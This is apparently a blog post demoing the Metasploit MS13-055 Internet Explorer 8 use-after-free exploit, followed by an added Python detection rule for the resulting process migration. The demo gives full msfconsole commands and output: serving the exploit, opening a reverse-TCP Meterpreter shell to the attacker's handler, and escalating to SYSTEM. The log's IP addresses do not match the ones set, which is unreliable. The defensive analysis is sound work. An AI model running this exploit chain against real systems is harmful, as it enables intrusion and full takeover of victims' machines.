Metasploit MS13-055 Demo

Recently released Metasploit module for CVE-2013-3166.
I wouldn’t be surprised if exploit kits begin to leverage this vulnerability in the near future.

Description:
In IE8 standards mode, it’s possible to cause a use-after-free
condition by first creating an illogical table tree, where a
CPhraseElement comes after CTableRow, with the final node being a
sub table element. When the CPhraseElement’s outer content is reset
by using either outerText or outerHTML through an event handler,
this triggers a free of its child element (in this case, a
CAnchorElement, but some other objects apply too), but a reference
is still kept in function SRunPointer::SpanQualifier. This function
will then pass on the invalid reference to the next functions,
eventually used in mshtml!CElement::Doc when it’s trying to make a
call to the object’s SecurityContext virtual function at offset
+0x70, which results in a crash. An attacker can take advantage of this
by first creating a CAnchorElement object, let it free, and then
replace the freed memory with another fake object. Successfully
doing so may allow arbitrary code execution under the context of the
user. This bug is specific to Internet Explorer 8 only. It was
originally discovered by Orange Tsai at Hitcon 2013, but was
silently patched in the July 2013 update.

References:
http://technet.microsoft.com/en-us/security/bulletin/ms13-055
https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf
http://blogs.technet.com/b/srd/archive/2013/07/10/running-in-the-wild-not-for-so-long.aspx?Redirected=true

Commands:

msf > use exploit/windows/browser/ms13_055_canchor
msf exploit(ms13_055_canchor) > set SRVHOST 192.168.23.54
msf exploit(ms13_055_canchor) > set URIPATH /
msf exploit(ms13_055_canchor) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms13_055_canchor) > set LHOST 192.168.23.56
msf exploit(ms13_055_canchor) > exploit
[*] Exploit running as background job.
msf exploit(ms13_055_canchor) >
[*] Started reverse handler on 192.168.23.194:4444
[*] Using URL: http://192.168.23.194:8080/
[*] Server started.
[*] 192.168.23.72 ms13_055_canchor - Using msvcrt ROP
[*] 192.168.23.72 ms13_055_canchor - Sending exploit...
[*] 192.168.23.72 ms13_055_canchor - Using msvcrt ROP
[*] 192.168.23.72 ms13_055_canchor - Sending exploit...
[*] Sending stage (752128 bytes) to 192.168.23.72
[*] Meterpreter session 1 opened (192.168.23.194:4444 -> 192.168.23.72:1048) at 2013-09-15 17:33:48 -0200
[*] Session ID 1 (192.168.23.194:4444 -> 192.168.23.72:1048) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2088)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 616
[+] Successfully migrated to process
msf exploit(ms13_055_canchor) > sessions -i 1
meterpreter > getuid
Server username: VICTIM-PC\victim
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
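The tail of the session is the part a defender can see in endpoint telemetry: the browser process (iexplore.exe, pid 2088) had an outbound connection to the handler on tcp/4444, then spawned notepad.exe (pid 616) as the target of 'migrate -f'. The following is an added example, not part of the original post or of Metasploit: a small correlation over constructed process-creation and network events that flags a browser spawning a known migration target, and raises severity when the same browser had recently connected to a non-web port. The event schema, port allowlist and sample events are assumptions built for the example.

```python
from dataclasses import dataclass
from typing import List

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
MIGRATION_TARGETS = {"notepad.exe"}   # what 'migrate -f' spawned in the session log
WEB_PORTS = {80, 443, 8080, 8443}     # assumed allowlist of ports a browser normally uses

@dataclass
class Event:
    ts: int                  # seconds since epoch (constructed)
    kind: str                # "proc" (process creation) or "net" (outbound connect)
    pid: int
    image: str
    ppid: int = 0
    parent_image: str = ""
    dst_port: int = 0

def detect_browser_migration(events: List[Event], window: int = 300) -> List[str]:
    """Alert when a browser spawns a known migration target. Severity is 'high' if
    the same browser pid connected to a non-web port within `window` seconds before."""
    odd_ports = {}                       # browser pid -> list of (ts, dst_port)
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "net" and ev.image.lower() in BROWSERS and ev.dst_port not in WEB_PORTS:
            odd_ports.setdefault(ev.pid, []).append((ev.ts, ev.dst_port))
        elif ev.kind == "proc" and ev.parent_image.lower() in BROWSERS \
                and ev.image.lower() in MIGRATION_TARGETS:
            recent = [p for t, p in odd_ports.get(ev.ppid, []) if ev.ts - t <= window]
            sev = "high" if recent else "medium"
            alerts.append(f"[{sev}] {ev.parent_image} (pid {ev.ppid}) spawned {ev.image} "
                          f"(pid {ev.pid}); prior non-web ports: {sorted(set(recent))}")
    return alerts

# Constructed events mirroring the session above (pids 2088 and 616 are from the log)
SAMPLE = [
    Event(100, "proc", 2088, "iexplore.exe", 900, "explorer.exe"),
    Event(105, "net", 2088, "iexplore.exe", dst_port=8080),        # fetching the served page
    Event(106, "net", 2088, "iexplore.exe", dst_port=4444),        # reverse_tcp handler
    Event(130, "proc", 616, "notepad.exe", 2088, "iexplore.exe"),  # 'migrate -f' spawn
    Event(200, "proc", 700, "notepad.exe", 900, "explorer.exe"),   # user-launched, benign
]

if __name__ == "__main__":
    for alert in detect_browser_migration(SAMPLE):
        print(alert)
```

The benign notepad.exe launched from explorer.exe produces no alert, so the rule keys on the parent relationship rather than on the image name alone.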